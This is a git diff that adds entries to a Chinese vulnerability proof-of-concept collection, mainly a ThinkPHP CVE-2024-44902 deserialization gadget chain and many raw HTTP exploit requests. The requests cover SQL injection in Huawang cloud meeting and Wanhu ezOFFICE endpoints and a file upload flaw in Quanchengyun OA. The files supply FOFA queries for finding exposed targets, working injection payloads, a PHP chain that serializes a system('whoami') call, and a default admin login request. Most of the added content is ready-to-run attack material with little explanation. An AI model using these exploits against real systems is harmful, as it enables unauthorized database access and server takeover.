- [科荣AIO-ReadFile存在任意文件读取漏洞](./科荣AIO/科荣AIO-ReadFile存在任意文件读取漏洞.md)
- [科荣AIO管理系统endTime参数存在SQL注入漏洞](./科荣AIO/科荣AIO管理系统endTime参数存在SQL注入漏洞.md)
+ - [科荣AIO系统接口UtilServlet存在代码执行漏洞](./科荣AIO/科荣AIO系统接口UtilServlet存在代码执行漏洞.md)
- 科讯图书馆综合管理云平台
- [科讯一卡通管理系统DataService.asmx存在SQL注入漏洞](./科讯图书馆综合管理云平台/科讯一卡通管理系统DataService.asmx存在SQL注入漏洞.md)
- [科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞](./科讯图书馆综合管理云平台/科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞.md)
- [科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞](./科讯图书馆综合管理云平台/科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞.md)
- [科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入](./科讯图书馆综合管理云平台/科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入.md)
- 章管家-印章智慧管理平台
+ - [章管家list.htm存在SQL注入漏洞](./章管家-印章智慧管理平台/章管家list.htm存在SQL注入漏洞.md)
- [章管家listUploadIntelligent接口存在sql注入漏洞](./章管家-印章智慧管理平台/章管家listUploadIntelligent接口存在sql注入漏洞.md)
- [章管家updatePwd.htm存在任意账号密码重置漏洞](./章管家-印章智慧管理平台/章管家updatePwd.htm存在任意账号密码重置漏洞.md)
- [章管家前台任意文件上传漏洞(XVE-2024-19042)](./章管家-印章智慧管理平台/章管家前台任意文件上传漏洞(XVE-2024-19042).md)
@@ -1190,8 +1240,9 @@
- [网康科技NS-ASG应用安全网关config_Anticrack.php存在SQL注入漏洞](./网康科技/网康科技NS-ASG应用安全网关config_Anticrack.php存在SQL注入漏洞.md)
- [网康科技NS-ASG应用安全网关config_ISCGroupNoCache.php存在SQL注入漏洞](./网康科技/网康科技NS-ASG应用安全网关config_ISCGroupNoCache.php存在SQL注入漏洞.md)
- [网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022)](./网康科技/网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md)
-- 网御-ACM-上网行为管理系统
- - [网御-ACM-上网行为管理系统bottomframe.cgi-SQL-注入漏洞](./网御-ACM-上网行为管理系统/网御-ACM-上网行为管理系统bottomframe.cgi-SQL-注入漏洞.md)
+- 网御星云
+ - [网御ACM上网行为管理系统bottomframe.cgi存在SQL注入漏洞](./网御星云/网御ACM上网行为管理系统bottomframe.cgi存在SQL注入漏洞.md)
+ - [网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014)](./网御星云/网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014).md)
- 网神
- [某神-SecGate-3600-防火墙-obj_app_upfile-任意文件上传漏洞](./网神/某神-SecGate-3600-防火墙-obj_app_upfile-任意文件上传漏洞.md)
- [某神SecSSL3600安全接入网关系统任意密码修改漏洞](./网神/某神SecSSL3600安全接入网关系统任意密码修改漏洞.md)
@@ -1277,6 +1328,9 @@
- [西软云XMS-futurehotel-operate接口存在XXE漏洞](./西软云/西软云XMS-futurehotel-operate接口存在XXE漏洞.md)
- [西软云XMS-futurehotel-query接口存在XXE漏洞](./西软云/西软云XMS-futurehotel-query接口存在XXE漏洞.md)
- [西软云XMS反序列化漏洞](./西软云/西软云XMS反序列化漏洞.md)
+- 誉龙数字
+ - [誉龙视音频综合管理平台FindById存在SQL注入漏洞](./誉龙数字/誉龙视音频综合管理平台FindById存在SQL注入漏洞.md)
+ - [誉龙视音频综合管理平台TimeSyn存在远程命令执行漏洞](./誉龙数字/誉龙视音频综合管理平台TimeSyn存在远程命令执行漏洞.md)
- 资管云
- [资管云comfileup.php前台文件上传漏洞(XVE-2024-18154)](./资管云/资管云comfileup.php前台文件上传漏洞(XVE-2024-18154).md)
- 赛思
@@ -1296,6 +1350,7 @@
- [超级猫签名APP分发平台前台存在SQL注入漏洞](./超级猫签名APP分发平台/超级猫签名APP分发平台前台存在SQL注入漏洞.md)
- [超级猫签名APP分发平台前台远程文件写入漏洞](./超级猫签名APP分发平台/超级猫签名APP分发平台前台远程文件写入漏洞.md)
- 路由器
+ - [AC集中管理平台未授权漏洞](./路由器/AC集中管理平台未授权漏洞.md)
- [ALR-F800存在命令执行漏洞](./路由器/ALR-F800存在命令执行漏洞.md)
- [CERIO-DT系列路由器Save.cgi接口存在命令执行漏洞](./路由器/CERIO-DT系列路由器Save.cgi接口存在命令执行漏洞.md)
- [draytek路由器addrouting命令执行漏洞](./路由器/draytek路由器addrouting命令执行漏洞.md)
@@ -1419,6 +1474,8 @@
- [多个防火墙产品RCE](./防火墙产品/多个防火墙产品RCE.md)
- 青藤云-EDR
- [青藤云-EDR-权限提升漏洞](./青藤云-EDR/青藤云-EDR-权限提升漏洞.md)
+- 顺景ERP
+ - [顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞](./顺景ERP/顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞.md)
- 风速科技统一认证平台
- [风速科技统一认证平台存在密码重置漏洞](./风速科技统一认证平台/风速科技统一认证平台存在密码重置漏洞.md)
- 飞企互联
@@ -1439,5 +1496,7 @@
- [飞鱼星上网行为管理系统企业版前台RCE](./飞鱼星/飞鱼星上网行为管理系统企业版前台RCE.md)
- 驰骋BPM
- [驰骋BPM系统存在SQL注入漏洞](./驰骋BPM/驰骋BPM系统存在SQL注入漏洞.md)
+- 魅思视频管理系统
+ - [魅思视频管理系统getOrderStatus存在SQL注入漏洞](./魅思视频管理系统/魅思视频管理系统getOrderStatus存在SQL注入漏洞.md)
- 魔方网表
- [魔方网表mailupdate.jsp接口存在任意文件上传漏洞](./魔方网表/魔方网表mailupdate.jsp接口存在任意文件上传漏洞.md)
diff --git "a/thinkphp/thinkphp\346\234\200\346\226\260CVE-2024-44902\345\217\215\345\272\217\345\210\227\345\214\226\346\274\217\346\264\236.md" "b/thinkphp/thinkphp\346\234\200\346\226\260CVE-2024-44902\345\217\215\345\272\217\345\210\227\345\214\226\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..3309c97
--- /dev/null
+++ "b/thinkphp/thinkphp\346\234\200\346\226\260CVE-2024-44902\345\217\215\345\272\217\345\210\227\345\214\226\346\274\217\346\264\236.md"
@@ -0,0 +1,103 @@
+# thinkphp最新CVE-2024-44902反序列化漏洞
+
+Thinkphp v6.1.3 至 v8.0.4 中存在反序列化漏洞,允许攻击者执行任意代码。
+
+## demo
+
+```php
+*{ padding: 0; margin: 0; }';
+ }
+
+ public function hello($name = 'ThinkPHP8')
+ {
+ return 'hello,' . $name;
+ }
+}
+
+```
+
+## poc
+
+```php
+options["username"]=new Pivot();
+ }
+}
+
+namespace think\model;
+use think\model;
+class Pivot extends Model
+{
+
+}
+
+namespace think;
+abstract class Model{
+ private $data = [];
+ private $withAttr = [];
+ protected $json = [];
+ protected $jsonAssoc = true;
+ function __construct()
+ {
+ $this->data["fru1ts"]=["whoami"];
+ $this->withAttr["fru1ts"]=["system"];
+ $this->json=["fru1ts"];
+ }
+}
+
+namespace think\route;
+use think\DbManager;
+class ResourceRegister
+{
+ protected $registered = false;
+ protected $resource;
+ function __construct()
+ {
+ $this->registered=false;
+ $this->resource=new DbManager();
+ }
+}
+namespace think;
+use think\model\Pivot;
+class DbManager
+{
+ protected $instance = [];
+ protected $config = [];
+ function __construct()
+ {
+ $this->config["connections"]=["getRule"=>["type"=>"\\think\\cache\\driver\\Memcached","username"=>new Pivot()]];
+ $this->config["default"]="getRule";
+ }
+}
+
+use think\route\ResourceRegister;
+$r=new ResourceRegister();
+echo urlencode(serialize($r));
+
+```
+
+![image-20240916205334112](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409162053192.png)
+
+
+
+## 漏洞来源
+
+- https://github.com/fru1ts/CVE-2024-44902
+- https://xz.aliyun.com/t/15582
\ No newline at end of file
diff --git "a/\344\270\207\346\210\267OA/\344\270\207\346\210\267ezOFFICE\347\263\273\347\273\237\346\216\245\345\217\243filesendcheck_gd.jsp\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\344\270\207\346\210\267OA/\344\270\207\346\210\267ezOFFICE\347\263\273\347\273\237\346\216\245\345\217\243filesendcheck_gd.jsp\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..84e6a3d
--- /dev/null
+++ "b/\344\270\207\346\210\267OA/\344\270\207\346\210\267ezOFFICE\347\263\273\347\273\237\346\216\245\345\217\243filesendcheck_gd.jsp\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,23 @@
+# 万户ezOFFICE系统接口filesendcheck_gd.jsp存在SQL注入漏洞
+
+万户 ezOFFICE filesendcheck_gd.jsp 接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
+
+## fofa
+
+```yaml
+app="万户ezOFFICE协同管理平台"
+```
+
+## poc
+
+```javascript
+GET /defaultroot/modules/govoffice/gov_documentmanager/filesendcheck_gd.jsp;.js?recordId=1;waitfor+delay+'0:0:5'-- HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409101024017.png)
\ No newline at end of file
diff --git "a/\345\205\250\347\250\213\344\272\221OA/\345\205\250\347\250\213\344\272\221OA\346\216\245\345\217\243UploadFile\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" "b/\345\205\250\347\250\213\344\272\221OA/\345\205\250\347\250\213\344\272\221OA\346\216\245\345\217\243UploadFile\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..3ed3a19
--- /dev/null
+++ "b/\345\205\250\347\250\213\344\272\221OA/\345\205\250\347\250\213\344\272\221OA\346\216\245\345\217\243UploadFile\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md"
@@ -0,0 +1,37 @@
+# 全程云OA接口UploadFile存在任意文件上传漏洞
+
+全程云OA接口UploadFile存在任意文件上传漏洞。该漏洞允许攻击者上传webshell木马获取服务器权限。
+
+## fofa
+
+```java
+body="images/yipeoplehover.png"
+```
+
+## poc
+
+```java
+POST /OA/api/2.0/Common/AttachFile/UploadFile HTTP/1.1
+Host:
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Ldwk: bG91ZG9uZ3dlbmt1
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNe8DcVuv1vEUWDaR
+Content-Length: 191
+
+------WebKitFormBoundaryNe8DcVuv1vEUWDaR
+Content-Disposition: form-data; name="upload";filename="123.Asp"
+
+<% response.write("hello,world") %>
+------WebKitFormBoundaryNe8DcVuv1vEUWDaR--
+```
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/T4kFVsKphUd6OYRYMyMUtg
\ No newline at end of file
diff --git "a/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260checkDoubleUserNameForAdd\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260checkDoubleUserNameForAdd\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..3dbdefc
--- /dev/null
+++ "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260checkDoubleUserNameForAdd\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,25 @@
+# 华望云会议管理平台checkDoubleUserNameForAdd存在SQL注入漏洞
+
+华望云会议管理平台checkDoubleUserNameForAdd存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息
+
+## fofa
+
+```kotlin
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+POST /ajax/checkDoubleUserNameForAdd HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+
+userName=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'
+```
+
diff --git "a/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260conflog.inc\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260conflog.inc\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..dcf886b
--- /dev/null
+++ "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260conflog.inc\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,23 @@
+# 华望云会议管理平台conflog.inc存在SQL注入漏洞
+
+华望云会议管理平台 `conflog.inc` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+POST /page/conflog.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'¶ms[]=confName¶ms[]=confId&selectTime=1 HTTP/1.1
+Host:
+Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+X-Requested-With: XMLHttpRequest
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+```
+
diff --git "a/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260confmanger.inc\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260confmanger.inc\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..30f0a3e
--- /dev/null
+++ "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260confmanger.inc\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,23 @@
+# 华望云会议管理平台confmanger.inc存在SQL注入漏洞
+
+华望云会议管理平台 `confmanger.inc` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+POST /page/confmanger.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'¶ms[]=confName¶ms[]=confId¶ms[]=displayName HTTP/1.1
+Host:
+X-Requested-With: XMLHttpRequest
+Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: */*
+```
+
diff --git "a/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260deptactionlist\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260deptactionlist\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..0d0c8f0
--- /dev/null
+++ "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260deptactionlist\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,23 @@
+# 华望云会议管理平台deptactionlist存在SQL注入漏洞
+
+华望云会议管理平台 `deptactionlist` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+POST /page/deptactionlist?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'&dpId=1¶ms[]=dpName¶ms[]=dpId HTTP/1.1
+Host:
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+```
+
+![6c237de2647241b88da8985fa11e6dff.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132246419.png)
\ No newline at end of file
diff --git "a/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260myconflist.in\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260myconflist.in\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..caf0edd
--- /dev/null
+++ "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260myconflist.in\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,24 @@
+# 华望云会议管理平台myconflist.in存在SQL注入漏洞
+
+华望云会议管理平台 `myconflist.in` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+GET /page/myconflist.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'¶ms[]=confName¶ms[]=confId&selectTime=1 HTTP/1.1
+Host:
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+X-Requested-With: XMLHttpRequest
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Cookie: uid=112; 获取到的cookie languageGlobal=1
+```
+
+![ed5c1a12018c4e1a862263ac386838f5.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132247707.png)
\ No newline at end of file
diff --git "a/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260recodemanger.inc\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260recodemanger.inc\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..bfb25f3
--- /dev/null
+++ "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260recodemanger.inc\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,23 @@
+# 华望云会议管理平台recodemanger.inc存在SQL注入漏洞
+
+华望云会议管理平台 `recodemanger.inc` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+POST /page/recodemanger.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'¶ms[]=nName¶ms[]=confName¶ms[]=displayName¶ms[]=status&selectTime=1 HTTP/1.1
+Host:
+Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+```
+
diff --git "a/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260recodemangerForUser.inc\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260recodemangerForUser.inc\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..6afafa7
--- /dev/null
+++ "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260recodemangerForUser.inc\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,24 @@
+# 华望云会议管理平台recodemangerForUser.inc存在SQL注入漏洞
+
+华望云会议管理平台 `recodemangerForUser.inc` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+POST /page/recodemangerForUser.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'¶ms[]=nName¶ms[]=confName¶ms[]=displayName¶ms[]=status&selectTime=1 HTTP/1.1
+Host:
+Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+```
+
+![93b1d1d9d0b14cf1b9ddedc313f2fa8d.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132244574.png)
\ No newline at end of file
diff --git "a/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260syslog.inc\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260syslog.inc\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..f241bbd
--- /dev/null
+++ "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260syslog.inc\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,23 @@
+# 华望云会议管理平台syslog.inc存在SQL注入漏洞
+
+华望云会议管理平台 `syslog.inc` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+POST /page/syslog.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'¶ms[]=displayName¶ms[]=module¶ms[]=act¶ms[]=ip&selectTime=1 HTTP/1.1
+Host:
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+```
+
diff --git "a/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260useractionlist\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260useractionlist\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..7eb9fd5
--- /dev/null
+++ "b/\345\215\216\346\234\233\344\272\221/\345\215\216\346\234\233\344\272\221\344\274\232\350\256\256\347\256\241\347\220\206\345\271\263\345\217\260useractionlist\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,43 @@
+# 华望云会议管理平台useractionlist存在SQL注入漏洞
+
+华望云会议管理平台 `useractionlist` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+获取cookie
+
+```javascript
+POST /ajax/userlogin HTTP/1.1
+Host:
+Accept: */*
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+X-Requested-With: XMLHttpRequest
+
+userNameCopy=admin&userName=admin&passWordCopy=admin&passWord=21232f297a57a5a743894a0e4a801fc3
+```
+
